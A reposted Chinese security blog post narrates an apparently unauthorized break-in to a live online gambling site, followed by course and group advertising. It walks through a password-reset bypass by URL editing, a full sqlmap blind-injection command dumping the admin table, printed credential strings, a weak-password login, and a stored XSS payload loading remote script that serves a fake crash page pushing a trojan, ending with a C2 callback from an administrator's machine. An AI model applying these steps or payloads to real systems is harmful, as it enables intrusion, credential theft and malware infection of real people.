实战渗透BC从XSS到上线
2023-12-21 20:52:29 Author: Z2O安全攻防(查看原文) 阅读量:19 收藏

点击上方[蓝字],关注我们

建议大家把公众号“Z2O安全攻防”设为星标,否则可能就看不到啦!因为公众号现在只对常读和星标的公众号才能展示大图推送。操作方法:点击右上角的【...】,然后点击【设为星标】即可。

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。

前言

 最近闲来无事,好久也没实战了,直接找BC开刀,最后全靠XSS上线。

信息搜集

  首页如下,我随手输入一个admin 123456,果然没有奇迹发生


  点击忘记密码,输入admin
  


  很好,至少说明存在admin账号
  


  上图url为Public.forgetPaw1.userName.admin.do,我直接修改成Public.forgetPaw2.userName.admin.do后。芜湖,成功绕过验证,赶紧设置一个新密码,登录进去看看,其实这里也可以随便注册的,但我就想看看admin账号有什么东西。
  


  看这中奖榜心动不,再看看此账户余额0元,我就知道这是个假账号
  


  看看个人中心的交易等等记录,全部都是空的,假账号实锤
  


  看到头像,立马找上传点,好家伙呀,头像都不能自己上传,安全性真高呀。
  


  在此页面,到处点点,翻翻翻,都没找到可利用的地方。主要是功能太少了,来到客服页面,尝试一波XSS看能打上线不。
  


  这聊天界面,一输入<script>字符,就被跳转到下面的留言框,看来是有waf的。
  


  这不上传点来了嘛,抓包一看,腾讯云的waf,客服页面我是打不动了。
  


  扫扫目录,基本啥也没有
  


  看看index.html,宝塔搭建
  


  随便在url栏,乱输入,爆路径了
  


  赶紧记下绝对路径,后面可能有用,这不 ThinkAdmin 嘛,基于 ThinkPHP 开发的,拿出工具开始梭哈。
  

SQL注入

  梭哈失败后。用fofa找到了后台登录页面
  


  再次用 ThinkPHP 利用工具梭哈,竟然有个日志泄露,而下面的工具梭哈主站是找不到日志泄露的,所以渗透的时候要多仔细。
  


  下载下来看了看日志的信息也没有啥,也可以去遍历它的日志,再筛选出有用的信息,不过太漫长了,而且也不一定有回报,这条路我就放弃了。登录页面试了试弱口令无果。登录页面抓包放到slqmap跑跑
  


  出sql延时盲注了,注入点在info[name]
  


  后面经过漫长的等待,终于找到管理员的账号了

python sqlmap.py -r 1.txt --random-agent --force-ssl --technique=T --proxy=socks5://127.0.0.1:10808 -D caipai -T caipiao_adminmember -C username,password,safecode --dump


  账号信息 keful:MDAwMDAwMDAwMLGIet6Gp7lr:147258admin:MDAwMDAwMDAwMLZ8ftWaqtCpmb2ooMR5nKevjJKEfop2dQ:159357
  这密码咋看都不像md5,果然解不出来
  


  遇到困难不要怕,不就是密码解不出嘛,我反手一个123456,keful账号就成功进去了,弱口令永远的神。大哥留个联系方式呀,源码给我一个。
  


  又到了经典的找上传点环节,这下后台连修改头像的按钮都没有,比前台更安全。看了看充值记录和提现记录,我的评价是一眼丁真,鉴定为假。
  


  试了试前面的绝对路径上传文件,失败。
  


  用的 KindEditor 编译器版本 4.1.10,它存在CVE-2017-1002024 文件上传漏洞,不过这里没有,遗憾。
  

XSS水坑钓鱼

  进展卡在这里了,后来师傅指点可以用XSS水坑钓鱼。这里我没进行页面跳转,直接利用xss加载伪造页面,收杆的话使用服务端做判断。如果对方不下载木马,那他就会一直卡在这个崩溃页面,除非他会f12禁用js。本地测试xss,XSS平台成功收到信息。
  


  在写xss的payload的时候,URL处一定要是 <script src=//test/xss.js></script> 这样的,而不是这样 <script src="https://test/xss.js"></script> ,也不能是这样 <script src="http://test/xss.js"></script>。因为如果你写成https://test/xss.js,而目标站点用http协议的话,是连不上xss平台的,反之亦然。所以使用 //test/xss.js 这样的写法,让它自动切换协议,保证和目标站一致。
  找插入xss的点要考虑三个问题。第一个,插入后的xss payload最好能被编辑。第二个管理员最好刚刚登录页面,就渲染我们的恶意js。第三个,不要影响到前台的正常用户。
  第一个xss点,下面的框框是可以随便xss的,但是一旦成功插入,就不能再编辑我们的xss了,所以这个点暂时放弃。
  


  第二个xss点,这里就能反复编辑,但是有可能影响到前台用户,测试的时候,用h3标签,如果h3都不行,那script标签也基本没戏。
  


  成功xss
  


  后面我反复找xss点,都没找到一个满意的点,始终不能满足我前面提到的3个问题。算了,管它的,就在这里插入我的恶意js。等管理员上线,再点击内容管理中的咨询栏目管理,才能触发,行吧,慢慢等吧。
  几天后,查看c2平台,已经成功上线了,哎,柬埔寨老哥,又是被骗过去的,祝你早日回家吧。
  

总结

  这是我第一次打下bc站,而面对非常规站点,要出邪招。这种最终目标是要拿到个人或客服的机子权限,而不是拿下服务器。因为大部分有用的信息都在个人机上。如果拿下了服务器,就需要在管理员的必经之路上,插入恶意js。比如直接在后台页面加入恶意js,这样又形成水坑钓鱼,让管理员上线。最快的方式就是在客服聊天界面,找XSS,这就考验师傅们的绕过功底了。

文章来源:https://maidang.cool/2023/52542.html

学习圈子

一个引导大家一起成长,系统化学习的圈子。

如果看到这里的师傅是基础不够扎实/技术不够全面/入行安全不久/有充足时间的初学者...其中之一,那么欢迎加入我们的圈子,圈子提供以下内容:点我了解详情

1、每周发布学习任务,由浅入深,循序渐进,从常见的Web漏洞原理与利用、业务逻辑漏洞与挖掘,到WAF绕过、代码审计、钓鱼与免杀,再到Linux/Windows内网、提权、权限维持、隧道代理、域渗透,层层递进。会发布相应的参考资料及建议,成员自行学习实践,并会根据每周任务选取1-3位完成优秀的成员,返还入圈费用。
2、日常分享优质学习资源与攻防渗透技巧,包括但不限于渗透tips、教程、手册、学习路线等。
3、一个学习氛围浓厚的社区,遇到问题可以快速提问、交流讨论,共同学习。
  • 目前已经规划了几个月的内容:

第一周的学习任务将在2024.1.1发布,在此之前加入圈子会有一定优惠,先来就是赚到,欢迎加入我们,一块学习:

                      

交流群

关注公众号回复“加群”,添加Z2OBot好友,自动拉你加入Z2O安全攻防交流群(微信群)分享更多好东西。(QQ群可直接扫码添加)

关注我们

关注福利:

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档

点个【 在看 】,你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247506649&idx=1&sn=14b5b334f063ae79c56b4b6190cbb0e2&chksm=cf908b2aa6d85c576fd66e11be988014b3060b3a3df674f4ce4c462c68afffe5f435345985cb&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh